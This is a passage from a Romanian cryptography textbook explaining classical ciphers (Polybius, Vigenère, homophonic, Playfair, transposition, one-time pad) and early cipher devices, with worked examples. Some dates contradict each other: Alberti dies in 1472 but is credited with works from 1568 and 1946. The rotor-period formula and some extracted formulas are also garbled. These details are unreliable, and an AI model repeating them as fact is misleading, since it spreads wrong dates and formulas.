În cifrul Polibios pentru fiecare alfabet se construieşte un careu aparte de cifrare, de cele mai
dese ori cu numărul de coloane şi linii egal (însă nu e o condiţie necesară). Dimensiunile careului
depind de lungimea n a alfabetului. Pentru a crea careul se iau două numere întregi, produsul cărora
e cel mai aproape de n. Liniile şi coloanele se numerotează. După aceasta literele alfabetului se
înscriu în acest careu în ordinea lor naturală. Dacă nu sunt suficiente celule pentru literele
alfabetului se pot înscrie într-o celulă 2 litere sau se pot omite câteva litere (de obicei de frecvenţa
cât mai redusă). Pentru alfabetul latin, putem avea careuri Polibios 5×5, după cum este reprezentat
în tabelul 5.2 (în al treilea careu a fost omisă litera Q care este una cu frecvenţă redusă):

m o u s e 1 2 3 4 5 a b c d e
m A B C D E 1 A B C D E a A B C D E
u F G H I/J K 2 F G H I/J K b F G H I J
s L M N O P 3 L M N O P c K L M N O
c Q R S T U 4 Q R S T U d P R S T U
a V W X Y Z 5 V W X Y Z e V W X Y Z
Tabelul 5.2. Exemple de tabele ale cifrului Polibios

8
În operaţia de criptare, fiecare caracter x va fi reprezentat printr-o pereche de litere (x, y),
unde x∈{m, o, u, s, e} iar y∈{m, u, s, c, a} pentru primul exemplu din figură, sau x, y∈{1, 2, 3, 4, 5}
și x, y∈{a, b, c, d, e} pentru exemplele doi și trei.
Astfel, pentru primul exemplu de tabel, textul clar VENI VIDI VICI este criptat în
ma em us su ma su sm su ma su um su.
Cifrul Polibius, prezentat în exemplul din mijloc al tabelului 5.2, a fost folosit de
condamnații din penitenciarele ruseşti şi de către prizonierii americani din Vietnam. Cifrul este
foarte simplu de învăţat şi poate fi aplicat folosind diverse semne drept coordonate-chei (cifre,
puncte, figuri, etc). Cifrul Polibios a fost utilizat de asemenea în cadrul altor sisteme de criptare,
cum ar fi sistemul nihilist, cifrul ADFGVX (utilizat de armata germană în primul război mondial)
sau sistemul Bifid.
Punctul slab al sistemelor de criptare monoalfabetice constă în frecvenţa de apariţie a
caracterelor în text. Dacă un text criptat este suficient de lung şi se cunoaşte limba în care este scris
textul clar, sistemul poate fi spart printr-un atac bazat pe frecvenţa apariţiei literelor într-o limbă
(atacul prin analiza frecvenței), această frecvență fiind o problemă studiată intens (nu neapărat în
scopuri criptografice) iar în rezultat au fost construite diverse structuri de ordine relativ la frecvenţa
apariţiei literelor în fiecare limbă europeană și în alte limbi.
De obicei, cu cât un text criptat este mai lung, cu atât frecvenţa literelor folosite se apropie
de această ordonare generală. O comparare între cele două relaţii de ordine (cea a caracterelor din
textul criptat şi cea a literelor din alfabetul limbii curente) conduce la realizarea câtorva
corespondenţe (literă text clar – literă text criptat), ceea ce stabileşte în mod univoc cheia de
criptare. Pentru algoritmul Cezar este suficientă stabilirea unei singure perechi, pentru cel afin
trebuiesc două perechi etc. Pentru limba română frecvenţa literelor este prezentată în tabelul 5.3 şi
figura 5.3.
A Ă Â B C D E F G H I Î J K L M
9,95 4,06 0,91 1,07 5,28 3,45 11,47 1,18 0,99 0,47 9,96 1,40 0,24 0,11 4,48 3,10
N O P Q R S Ş T Ţ U V W X Y Z
6,47 4,07 3,18 0,00 6,82 4,40 1,55 6,04 1,00 6,20 1,23 0,03 0,11 0,07 0,71
Tabelul 5.3. Frecvenţa literelor limbii române

9
Figura 5.3. Frecvenţa literelor limbii române
Cifruri de substituţie polialfabetică (polyalphabetic ciphers). Slăbiciunea cifrurilor
monoalfabetice este definită de faptul că distribuţia lor de frecvenţă reflectă distribuţia alfabetului
folosit. Un cifru este mai sigur din punct de vedere criptografic dacă prezintă o distribuţie cât mai
regulată, care să nu ofere informaţii criptanalistului.
O cale de a aplatiza distribuţia este combinarea distribuţiilor ridicate cu cele scăzute. Daca
litera T este criptată câteodată ca a şi altă dată ca b, şi dacă litera X este de asemenea câteodată
criptată ca a şi altă dată ca b, frecvenţa ridicată a lui T se combină cu frecvenţa scăzută a lui X
producând o distribuţie mai moderata pentru a şi pentru b. Două distribuţii se pot combina prin
folosirea a doua alfabete separate de criptare, primul pentru caracterele aflate pe poziţii pare în
textul clar, al doilea pentru caracterele aflate pe poziţii impare, rezultând necesitatea de a folosi
alternativ doua tabele de translatare, de exemplu permutările
p(a)=(3·a) mod 26 şi p2(a)=(7·a +13) mod 26.
Diferenţa dintre cifrurile polialfabetice şi cele monoalfabetice constă în faptul că substituţia
unui caracter variază în text, în funcţie de diverşi parametri (poziţie, context etc.). Aceasta conduce
bineînţeles la un număr mult mai mare de chei posibile. Se consideră că primul sistem de criptare
polialfabetic a fost creat de Leon Battista în 1568. Unele aplicaţii actuale folosesc încă pentru
anumite secţiuni astfel de sisteme de criptare.
Cifrul Vigenere. La fel ca cifrul Cezar, cifrul Vigenere deplasează literele, dar, spre
deosebire de acesta nu se poate sparge uşor în 26 combinaţii. Cifrul Vigenere foloseşte o deplasare
multiplă. Cheia nu este constituită de o singură deplasare, ci de mai multe, fiind generate de câţiva
întregi ki, unde 0 ≤ ki ≤ 25, dacă luăm ca reper alfabetul latin cu 26 de litere. Criptarea se face în
felul următor:
ci = mi + ki (mod 26).
Cheia poate fi, de exemplu, k = (5, 20, 17, 10, 20, 13) şi ar provoca deplasarea primei litere cu 5,
c1=m1 + 5 (mod 26), a celei de a doua cu 20, c2 = m2 + 20 (mod 26), ş.a.m.d. până la sfârşitul cheii

10
şi apoi de la început, din nou. Cheia este de obicei un cuvânt, pentru a fi mai uşor de memorat –
cheia de mai sus corespunde cuvântului „furtun”. Metoda cu deplasare multiplă oferă protecţie
suplimentară din două motive:
 primul motiv este că ceilalţi nu cunosc lungimea cheii;
 cel de al doilea motiv este că numărul de soluţii posibile creşte; de exemplu, pentru
lungimea cheii egală cu 5, numărul de combinaţii care ar fi necesare la căutarea
exhaustivă ar fi 265 = 11 881 376.
Decriptarea pentru cifrul Vigenere este asemănătoare criptării. Diferenţa constă în faptul că
se scade cheia din textul cifrat,
mi = ci – ki (mod 26).
Pentru simplificarea procesului de cifrare se poate utiliza următorul tabel, numit Tabula
Recta (tabelul 5.4). Aici toate cele 26 cifruri sunt situate pe orizontală şi fiecărui cifru îi corespunde
o anumită literă din cheie, reprezentată în colana din stânga tabelului. Alfabetul corespunzător
literelor textului clar se află în prima linie de sus a tabelului. Procesul de cifrare este simplu – este
necesar ca având litera x din cheie şi litera y din textul clar să găsim litera textului cifrat care se află
la intersecţia liniei x şi coloanei y. Se poate de procedat şi în conformitate cu ecuaţiile ce definesc
cifrul ci = mi + ki (mod 26) şi mi = ci – ki (mod 26), aşa cum este arătat în exemplul ce urmează.
a b c d e f g h i j k l m n o p q r s t u v w x y z
a A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
b B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
c C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
d D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
e E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
f F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
g G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
h H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
i I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
j J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
k K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
l L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
m M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
n N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
o O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
p P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
q Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
r R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
s S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
t T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
u U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
v V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
w W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
x X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
y Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
z Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
11
Tabelul 5.4. Tabula Recta pentru cifrul Vigenere
Problemă.
De cifrat, utilizând cifrul Vigenere, mesajul „Per aspera ad astra” folosind cheia K= SUPER.
Soluție. Pentru a cifra sau descifra mai întâi facem corespondenţa următoare:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
Apoi alcătuim şi completăm tabelul:
Textul clar M P E R A S P E R A A D A S T R A
Cheia K S U P E R S U P E R S U P E R S
Textul clar M 15 4 17 0 18 15 4 17 0 0 3 0 18 19 17 0
Cheia K 18 20 15 4 17 18 20 15 4 17 18 20 15 4 17 18
M+K (mod 26) 7 24 6 4 9 7 24 6 4 17 21 20 7 23 8 18
Textul cifrat C H Y G E J H Y G E R V U H X I S
Criptograma este C= HYGEJHYGERVUHXIS.
Pentru decriptare procedăm la fel, cu excepţia mi = ci – ki (mod 26).
Pentru acesta la fel completăm următorul tabel:
Textul cifrat C H Y G E J H Y G E R V U H X I S
Cheia K S U P E R S U P E R S U P E R S
Textul cifrat C 7 24 6 4 9 7 24 6 4 17 21 20 7 23 8 18
Cheia K 18 20 15 4 17 18 20 15 4 17 18 20 15 4 17 18
M–K (mod 26) 15 4 17 0 18 15 4 17 0 0 3 0 18 19 17 0
Textul clar M P E R A S P E R A A D A S T R A
Textul clar este M = PERASPERAADASTRA.
Criptanaliza sistemului Vigenere constă în următoarele:
fie c = c0 c1 ... cn-1 textul criptat cu cheia k = k0 k1 ... kp−1; putem aranja acest text sub forma unei
matrice cu p linii şi n / p  1 coloane, astfel:

c0 cp c2 p …
c1 c p1 c2 p1 …
   
c p1 c2 p1 c3 p1 …

Elementele de pe prima linie au fost criptate după formula


c pr  a pr  k0 (mod 26), k  0 ,

adică cu un sistem Cezar ( k 0 fiind o valoare fixată din Z26). În mod similar şi celelalte linii. Deci,
dacă s-ar cunoaşte lungimea p a cheii, problema s-ar reduce la criptanaliza a p texte criptate cu
Cezar – sistem de criptare monoalfabetic. Sunt cunoscute două metode pentru aflarea lungimii
cheii: testul lui Kasiski şi indexul de coincidenţă.

1
⌈x⌉ - funcția plafon, sau partea întreagă prin exces, este cel mai mic număr întreg mai mare decât numărul real x dat.
12
Prima metodă constă în studiul textului criptat şi aflarea de perechi de segmente de cel puţin
3 caractere identice (această lungime este propusă de Kasiski). Pentru fiecare astfel de pereche, se
determină distanta dintre segmente. După ce s-au găsit mai multe astfel de distanţe, valoarea lui p
va fi cel mai mare divizor comun al lor (sau – eventual un divizor al acestuia).
A doua metodă de aflare a lungimii cheii de criptare într-un sistem Vigenere se bazează pe
un concept definit în 1920 de Wolfe Friedman - indexul de coincidenţă. Dacă c  c1c2 ...cn este o
secvenţă de n caractere alfabetice, probabilitatea ca două caractere din c, alese aleator, să fie
identice se numeşte ”index de coincidenţă” I c (x) al lui c.
Cifrul omofonic (homophonic ciphers) este un cifru de substituţie în care un caracter al
alfabetului mesajului clar (alfabet primar) poate să aibă mai multe reprezentări. Ideea utilizată în
aceste cifruri este uniformizarea frecvenţelor de apariţie a caracterelor alfabetului textului cifrat
(alfabet secundar), pentru a îngreuna atacurile criptanalitice. Astfel, litera A - cu cea mai mare
frecvenţă de apariţie în alfabetul primar – poate fi înlocuită de exemplu cu H, # sau m.
Cifrul omofonic este un cifru intermediar între sistemele mono şi cele polialfabetice.
Principalul lui scop este de a evita atacul prin frecvenţa de apariţie a caracterelor. Se presupune că a
fost utilizat prima oară în 1401 de către ducele de Mantua. În cifrul omofonic fiecărui caracter
a  m i se asociază o mulţime H(a)  c astfel încât:
 H(a) ∩ H(b) =   a  b;
 Dacă a apare mai frecvent decât b în textele clare, atunci card (H(a)) ≥ card(H(b)).
Criptarea unui caracter x  m se face cu un element ales aleator din H(a). Pentru decriptarea lui
y  c se caută o mulţime H(x) astfel încât y  H(x).
Exemplu. Pentru limba engleză poate fi utilizat cifrul definit de tabelul 5.5, în primele două linii ale
căruia sunt aşezate literele alfabetului latin şi frecvenţele rotunjite ale acestora. În coloanele de sub
litera x este situat H(x). De exemplu
H(n) = {18, 58, 59, 66, 71,91}.
Pentru criptarea textului „ab” se poate folosi oricare din secvenţele
0948, 1248, 3348, 4748, 5348, 6748, 7848, 9248, 0981, 1281, 3381, 4781, 5381, 6781, 7881, 9281.
Tabelul 5.5 a fost completat cu numerele 00, 01,…, 99, ele fiind în cantitate de 100 pentru a
simplifica calculele legate de frecvența literelor (adică pentru a corespunde cu 100% a frecvențelor).
Însă elementele acestui tabel pot fi oricare simboluri, iar cantitatea lor va determina coeficientul de
proporționalitate pentru frecvențele fiecărei litere din alfabet.
a b c d e f g h i j k l m n o p q r s t u v w x y z
8 2 3 4 12 2 2 6 6 1 1 4 2 6 7 2 1 6 6 9 3 1 2 1 2 1
09 48 13 01 14 10 06 23 32 15 04 26 22 18 00 38 94 29 11 17 08 34 60 28 21 02
12 81 41 03 16 31 25 39 70 37 27 58 05 95 35 19 20 61 89 52
33 62 45 24 50 73 51 59 07 40 36 30 63
13
47 79 44 56 83 84 66 54 42 76 43
53 46 65 88 71 72 77 86 49
67 55 68 93 91 90 80 96 69
78 57 99 75
92 64 85
74 97
82
87
98
Tabelul 5.5. Exemplu de cifru omofonic pentru limba engleză
Deşi mai greu de spart decât cifrurile de substituţie simple (monoalfabetice), cifrul omofonic
nu maschează total proprietăţile statistice ale textului clar. În cazul unui atac cu text clar cunoscut,
cifrul se sparge extrem de uşor. Atacul cu text cifrat este mai dificil, dar unui calculator îi va lua
doar câteva secunde pentru a-l sparge.
Substituţie poligramică realizează substituirea unor blocuri de caractere (poligrame) din
textul clar, distrugând astfel semnificaţia, atât de utilă în criptanaliză, a frecvenţelor diferitelor
caractere. Vom considera un mesaj m=m1m2...mdmd+1... şi un cifru care prelucrează poligrame de
lungime d. Criptograma rezultată este c=c1c2...cdcd+1...cd+d..., fiecare poligramă mi,d+1...mi,d+d fiind
transformată în poligrama ci,d+1...ci,d+d prin funcţia de substitute fj astfel:
ci,d+j = fj(mi,d+1…mi,d+d)
În cazul cifrării literelor singulare frecvenţa de apariţie a literelor în textul cifrat este egală
cu frecvenţa de apariţie a literelor corespunzătoare din textul clar. Această invarianţă a frecvenţelor
furnizează o cantitate de informaţie suficientă criptanalistului pentru spargerea cifrului. Pentru
minimizarea informaţiei colaterale furnizate de frecvenţa de apariţie a literelor s-a utilizat cifrarea
grupurilor de d litere (d-grame). În cazul când un grup de d litere este substituit printr-un alt grup de
d litere, substituţia se numeşte poligramică. Substituţia poligramică cea mai simplă se obţine pentru
d =2 când digrama m1m2 din textul clar se substituie cu digrama c1c2 din textul cifrat.
Un exemplu clasic pentru substituţia diagramelor este cifrul lui Playfair (tabelul 5.6).
P L A Y F
I/J R B C D
E G H K M
N O Q S T
U V W X Z
Tabelul 5.6. Exemplu de cifru Playfair
Primele litere din pătrat (în caz general – un dreptunghi) reprezintă un cuvânt cheie k
(literele care se repetă se scriu o singură dată, în acest exemplu cheia fiind k=PLAYFAIR), după
care pătratul se completează cu literele alfabetului în ordinea lor naturală, fără repetare. Cifrarea se
executa după următoarele reguli:

14
 Pentru separarea literelor identice alăturate se introduc nişte caractere de separare care,
de regula, au frecventa de apariţie redusă, cum sunt de exemplu literele X, Q în limba
româna. În cazul în care numărul de caractere în textul clar este impar se procedează la
fel. La descifrare aceste litere introduse se omit.
 Dacă m1m2 sunt dispuse în vârfurile opuse ale unui dreptunghi, atunci c1c2 sunt
caracterele din celelalte vârfuri ale dreptunghiului, c1 fiind în aceeaşi linie cu m1. De
exemplu RK devine CG, deci RK  CG;
 Dacă m1 şi m2 se găsesc într-o linie, atunci c1 şi c2 se obţin printr-o deplasare ciclică spre
dreapta a literelor m1 şi m2. De exemplu PA  LY iar NO  OQ;
 Dacă m1 şi m2 se află în aceeaşi coloană atunci c1 şi c2 se obţin printr-o deplasare ciclică
a lui m1, m2 de sus în jos. De exemplu AH  BQ iar OV  VL;
Descifrarea se executa după reguli asemănătoare cu cele de cifrare, inversând direcția.
Exemplu. Folosind exemplul de mai sus (k = PLAYFAIR) pentru textul clar m=„VINE IARNA”
obţinem textul cifrat c=„UR UN BP IO YW”. Aici am introdus la sfârşitul mesajului litera X iar
AX  YW. La descifrare după sensul mesajului se omite această literă.
Cifrul Playfair se folosea în scopuri tactice de către forţele militare britanice în timpul celui
de-al doilea război al Burilor (1899-1902) dar şi în primul război mondial. La fel a fost utilizat de
către australieni şi germani în timpul celui de-al doilea război mondial. El era utilizat deoarece era
suficient de rapid în aplicare şi nu necesita nici un utilaj special. Scopul principal al utilizării lui era
protecţia informaţiei importante (însă nu şi secrete) pe parcursul unei lupte. La momentul când
criptanaliştii inamici spărgeau cifrul, informaţia deja nu mai era utilă pentru inamic.
Utilizarea cifrului Playfair în prezent nu are sens deoarece laptop-urile moderne pot sparge
cu uşurinţă cifrul în câteva secunde. Primul algoritm de spargere pentru Playfair a fost descris în
anul 1914 de către locotenentul Iosif O. Moubornom într-o broşură de 19 pagini.
5.2.2. Cifrul de transpoziţii
Spre deosebire de cifrurile cu substituţie, care păstrează ordinea literelor din textul sursă,
însă le transformă, cifrurile cu transpoziţie (transposition ciphers) reordonează literele, fără a le
„deghiza”. Criptarea prin metoda transpoziţiei este o tehnică mai eficientă decât criptarea prin
substituţie, dar are, la rândul ei, o mulţime de dezavantaje. Textul criptat prin metoda transpoziţiei
păstrează toate caracterele textului iniţial, dar în altă ordine obţinută prin aplicarea algoritmului ce
va fi prezentat în continuare.
Criptarea prin transpoziţie constă în scrierea textului iniţial din care s-au eliminat spaţiile şi
semnele de punctuaţie într-o matrice de dimensiune M×N şi interschimbarea anumitor linii (sau
coloane) între ele. Textul criptat se obţine prin scrierea caracterelor din noua matrice de pe fiecare
coloană în parte, începând cu colţul din stânga-sus. Dacă lungimea textului iniţial este mai mică
15
decât numărul de elemente ce pot fi scrise în matrice, atunci textul se completează cu elemente
aleatoare, până ajunge la dimensiunea M·N.
Pentru textul „Securitatea este asigurată”, care are lungimea de 24 de caractere, se pot alege
mai multe matrice de dimensiune M×N, o posibilitate ar fi ca matricea să aibă 4 linii şi 6 coloane,
dar pentru ca textul să fie mai greu de decodificat trebuie să conţină şi caractere alese aleator, sau
într-un mod mai inteligent, care să îngreuneze munca celui care doreşte să afle conţinutul secret din
mesajul criptat. Fie am ales o matrice care are 5 linii şi 6 coloane. Textului iniţial i se adaugă 6
caractere aleatoare şi se obţine textul Securi tateae steasi gurată xyztwu care se scrie în matricea din
partea stângă, aşa cum e arătat în tabelul 5.7:

1 2 3 4 5 6 1 2 3 4 5 6
1 S e c u r i 5 x y z t w u
2 t a t e a e 3 s t e a s i
3 s t e a s i 4 g u r a t ă
4 g u r a t ă 1 S e c u r i
5 x y z t w u 2 t a t e a e

Tabelul 5.7. Exemplu de cifru cu transpoziţie


Prin scrierea liniilor 1, 2, 3, 4, 5 în ordinea 5, 3, 4, 1, 2, această ordine fiind cheia cifrului,
adică k=5,3,4,1,2, se obţine matricea din partea dreaptă. Textul criptat care se obţine este
c= xsgSt ytuea zerct taaue wstra uiăie.
Pentru ca procesul de decriptare să fie mai simplu şi să nu mai fie nevoie de ordinea în care
au fost puse liniile din matricea creată, se foloseşte o versiune a criptării prin transpoziţie care se
bazează pe un cuvânt-cheie. Pentru a cripta un text folosind o cheie şi metoda transpoziţiei, se alege
o cheie ale cărei litere determină ordinea în care se vor scrie coloanele din matricea aleasă. Pentru a
afla ordinea în care vor fi scrise coloanele din textul iniţial, se ordonează alfabetic literele din cheie,
şi fiecărei litere i se asociază numărul de ordine din şirul ordonat. Lungimea cheii trebuie să fie
egală cu numărul de coloane din matrice.
Considerăm textul anterior, scris într-o matrice de dimensiuni 5×6, şi cheia „butuc” (tabelul
5.8.). Literele din cheie se ordonează alfabetic şi se obţine şirul: b, c, t, u, u. Indicele 1 este asociat
cu litera b, indicele 2 - cu litera c, indicele 3 - cu litera t, indicele 4 - cu prima literă u, iar indicele 5
este asociat cu a doua literă u. Pentru a rescrie liniile, pentru fiecare indice i din şirul ordonat se
caută indicele j, care reprezintă poziţia literei cu indicele i din cheie şi se scrie linia j, astfel:

1 2 3 4 5 6 1 2 3 4 5 6
b 1 S e c u r i 1 S e c u r i
u 4 t a t e a e 2 x y z t w u
t 3 s t e a s i 3 s t e a s i
u 5 g u r a t ă 4 t a t e a e
c 2 x y z t w u 5 x y z t w u

16
Tabelul 5.8. Exemplu de transpoziţie cu cheie
Textul cifrat care se obţine în final este c= Sxstx eytay czetz utaet rwsaw iuieu.
Pentru a decripta un mesaj criptat cu această metodă, criptograma se scrie în matrice pe
coloane, începând cu colţul stânga-sus, şi apoi se realizează operaţia inversă, adică pentru fiecare
indice j al literelor din cheie, se caută indicele i asociat literei din şirul sortat şi se scrie linia cu
indicele i. Din noua matrice astfel obţinută se scriu literele de pe fiecare linie, în ordinea naturală.
Spargerea unui cifru cu transpoziţie începe cu verificarea dacă acesta este într-adevăr de
acest tip prin calcularea frecventelor literelor şi compararea acestora cu statisticile cunoscute. Dacă
aceste valori coincid, se deduce că fiecare literă este „ea însăşi”, deci este vorba de un cifru cu
transpoziţie. Următorul pas este emiterea unei presupuneri în legătură cu numărul de coloane.
Acesta se poate deduce pe baza unui cuvânt sau expresii ghicite ca făcând parte din text.
Considerând spre exemplu sintagma „săprezinte”, cu grupurile de litere (luate pe coloane) „si”,
„ăn”, „pt”, „re”, se poate deduce numărul de litere care le separă, deci numărul de coloane. Notăm
în continuare cu m acest număr de coloane.
Pentru a descoperi modul de ordonare a coloanelor, dacă m este mic, se pot considera toate
posibilităţile de grupare a câte două coloane (în număr de m·(m – 1) ). Se verifică dacă ele formează
împreună un text corect numărând frecventele literelor şi comparându-le cu cele statistice. Perechea
cu cea mai bună potrivire se consideră corect poziţionată. Apoi se încearcă, după acelaşi principiu,
determinarea coloanei succesoare perechii din coloanele rămase iar apoi - a coloanei predecesoare.
În urma acestor operaţii, există şanse mari ca textul să devină recognoscibil.
Unele proceduri de criptare acceptă blocuri de lungime fixă la intrare şi generează tot un
bloc de lungime fixă. Aceste cifruri pot fi descrise complet prin lista care defineşte ordinea în care
caracterele vor fi trimise la ieşire (şirul poziţiilor din textul de intrare pentru fiecare caracter din
succesiunea generată).
De la apariţia cifrurilor cu substituţie şi a celor cu transpoziţie anii au trecut şi tehnicile de
criptare au evoluat foarte mult. Problema construirii unui cifru imposibil de spart i-a preocupat
îndelung pe criptanalişti; ei au dat o rezolvare teoretică simplă încă de acum câteva decenii dar
metoda nu s-a dovedit fiabilă din punct de vedere practic, după cum se va vedea în continuare.
Tehnica propusă pentru un cifru perfect presupune alegerea unui şir aleator de biţi pe post de
cheie şi aducerea textului sursă în forma unei succesiuni de biţi prin înlocuirea fiecărui caracter cu
codul său ASCII. Apoi se aplică o operaţie logică - de tip SAU exclusiv (operaţia inversă
echivalentei: 0 xor 0 = 0, 0 xor 1 = 1, 1 xor 0 = 1, 1 xor 1 = 0) - între cele două şiruri de biţi. Textul
cifrat rezultat nu poate fi spart pentru că nu există indicii asupra textului sursă şi nici textul cifrat nu
oferă criptanalistului informaţii. Pentru un eşantion de text cifrat suficient de mare, orice literă sau
grup de litere (diftong, triftong) va apărea la fel de des.

17
Acest procedeu este cunoscut sub numele de metoda cheilor acoperitoare. Deşi este perfectă
din punct de vedere teoretic, metoda are, din păcate, câteva dezavantaje practice:
 cheia nu poate fi memorată, astfel încât transmiţătorul şi receptorul să poarte câte o copie
scrisă a ei fiindcă în caz că ar fi „capturaţi”, adversarul ar obţine cheia;
 cantitatea totală de date care poate fi transmisă este determinată de dimensiunea cheii
disponibile;
 o nesincronizare a transmiţătorului şi receptorului care generează o pierdere sau o inserare
de caractere poate compromite întreaga transmisie fiindcă toate datele ulterioare incidentului
vor apărea ca eronate.

5.3. Mecanisme de criptare


Sistemele de criptare pot fi aduse la un grad mai mare de securitate dacă se folosesc
mijloace mecanice de criptare. Astfel de mecanisme special construite vor uşura operaţiile de
criptare/decriptare şi în acelaşi timp vor fi capabile să creeze un număr mult mai mare de chei
posibile.
5.3.1. Mijloace mecanice de criptare
Primele astfel de mecanisme au apărut încă în antichitate. În secolul V î.e.n. pentru criptarea
datelor se folosea un baston, numit Schitala (figura 5.4), în jurul căruia se înfăşura spiră lângă spiră
o panglică foarte îngustă de piele, papirus sau pergament pe care, pe generatoare se scriau literele
mesajelor. După ce textul era scris panglica se desfăşura, mesajul devenea indescifrabil, deoarece
literele erau dezasamblate. Mesajul se putea descifra numai de o persoană care dispunea de un
baston de grosime şi lungime identice cu bastonul iniţial pe care se înfăşura din nou panglica
primită de receptor. Astfel Schitala realiza o transpoziţie, aceasta fiind o primă formă a acestei
metode de criptare. Conform istoricilor greci, acest mod de comunicare era folosit de spartani în
timpul campaniilor militare. El avea avantajul de a fi rapid şi nu genera erori de transmitere.
Dezavantajul însă era acela că putea fi uşor de spart.

Figura 5.4. Schitala


Leon Battista Alberti (14.02.1404 – 25.04.1472) – scriitor, arhitect, pictor, sculptor,
matematician, criptograf, filozof italian şi umanist al Renaşterii a inventat „Criptograful lui Alberti”
(figura 5.5), care era alcătuit din două discuri concentrice cu diametre diferite, suprapuse. Fiecare
disc era împărţit în 24 sectoare pe care erau înscrise litere şi cifre. Pe discul exterior, care rămânea
18
static, erau scrise 20 de litere ale alfabetului italian (alfabetul italian nu avea literele H, J, K, W, X,
Y) în ordinea lor firească, iar apoi cifrele 1, 2, 3, 4. Pe discul interior care se rotea, erau scrise 23 de
litere ale alfabetului latin (fără J, K, Y) şi conjuncţia ET. Ordinea lor era arbitrară. Pentru cifrare se
stabilea o cheie, de exemplu G=a. Aceasta însemna că pentru cifrare litera a de pe discul mic se
aşeza în dreptul literei G de pe discul mare şi apoi începea cifrarea. Alberti recomanda schimbarea
cheii după un număr de cuvinte.
Criptograful lui Alberti a fost perfecţionat de către Silvester, Argenti şi alţii, constituind un
element de bază pentru criptografele de tip disc apărute ulterior. Silvester Porta a împărţit discurile
în 26 sectoare (Figura 5.5) utilizând astfel toate cele 26 litere ale alfabetului latin (nu numai italian),
criptograful său realizând astfel o substituţie simplă complet literală.
Criptograful avea două particularităţi care fac ca invenţia să fie un mare eveniment în
criptografie. În primul rând acest mecanism nu era altceva decât un algoritm de criptare
polialfabetică. În rândul al doilea discul respectiv permitea utilizarea aşa numitelor coduri cu
recifrare, care au apărut abia la sfârşitul secolului XIX, adică peste patru secole după invenţia lui
Alberti. În acest scop pe discul exterior erau scrise cifrele 1, 2, 3, 4. Alberti a compus un cod care
consta din 336 grupuri de coduri numerotate de la 11 la 4444. Fiecărui cod îi corespundea o
oarecare frază terminată. Când fraza se întâlnea în mesaj ea se înlocuia cu codul respectiv, iar cu
ajutorul discului cifrele erau criptate ca nişte semne ordinare ale mesajului, fiind transformate în
litere.
Leon Alberti poate fi considerat un criptograf ilustru şi din motivul că este autorul primei
lucrări de criptologie din Europa („De cifris”) publicată în 1946. În această lucrare erau prezentate
exemple de versiuni posibile de cifrare dar şi se argumenta necesitatea aplicării criptografie în
practică ca un instrument ieftin şi sigur de protecţie a informaţiei.

Criptograful lui Alberti Criptograful lui Silvester


Figura 5.5. Versiuni de Criptografe

Ideea de maşină de criptare apare clar prima dată la Thomas Jefferson, primul secretar de
Stat al Statelor Unite (preşedinte era George Washington), care a inventat un aparat de criptat numit
roată de criptare, folosit pentru securitatea corespondenţei cu aliaţii – în special cei francezi. Un
cilindru Jefferson (figura 5.6) este format din n discuri de dimensiuni egale (iniţial n = 26 sau n =

19
36) aşezate pe un ax. Discurile se pot roti independent pe ax, iar pe muchia fiecăruia sunt înscrise
cele 26 litere ale alfabetului, într-o ordine aleatoare (dar diferită pentru fiecare disc).
La criptare, textul clar se împarte în blocuri de n caractere. Fiecare astfel de bloc se scrie pe
o linie (generatoare) a cilindrului, rotind corespunzător fiecare disc pentru a aduce pe linie
caracterul căutat. Oricare din celelalte n-1 linii rămase poate constitui blocul de text criptat.

Figura 5.6. Cilindre Jefferson

Pentru decriptare este necesar un cilindru identic, în care se scrie pe o linie textul criptat (de
n caractere) şi apoi se caută printre celelalte 25 linii un text cu semnificaţie semantică.
Probabilitatea de a avea un singur astfel de text creşte cu numărul de discuri din cilindru.
O mică diferenţă apare dacă textul clar nu are nici o semnificaţie semantică (s-a folosit o
dublă criptare). Atunci trebuie convenită dinainte o anumită distanţă de criptare s (1 ≤ s ≤ 25).
Ordinea discurilor poate fi de asemenea schimbată. De exemplu, un cilindru cu n = 20
discuri poate realiza 20! = 2 432 902 008 176 640 000 texte criptate diferite pentru acelaşi text clar.
Cilindrul Jefferson realizează o substituţie polialfabetică de perioadă n. Dacă ar fi privit ca un
sistem de criptare Vigenere, lungimea cheii este enormă (de multe ori nn, în funcţie de modalităţile
de aranjare a alfabetelor pe discuri). Cilindrul Jefferson a fost reinventat ulterior de mai multe ori,
cea mai celebră fiind se pare maşina de criptat „Enigma”.
Thomas Jefferson a folosit acest aparat în perioada 1790 − 1802, după care se pare că ideea
s-a pierdut. Devenit preşedinte, Jefferson a fost atras de sistemul Vigenere, pe care îl consideră mai
sigur şi-l recomandă secretarului său de stat James Madison ca înlocuitor al sistemului pe care îl
inventase anterior.
5.3.2. Mașini rotor
O maşină rotor (rotor machine, figura 5.7) are o tastatură şi o serie de rotoare ce permit
implementarea unei versiuni a cifrului Vigénère. Fiecare rotor face o permutare arbitrară a
alfabetului, are 26 de poziţii şi realizează o substituţie simplă. Deoarece rotoarele se mişcă cu viteze
de rotaţie diferite, perioada unei maşini cu n rotoare este n·26!.
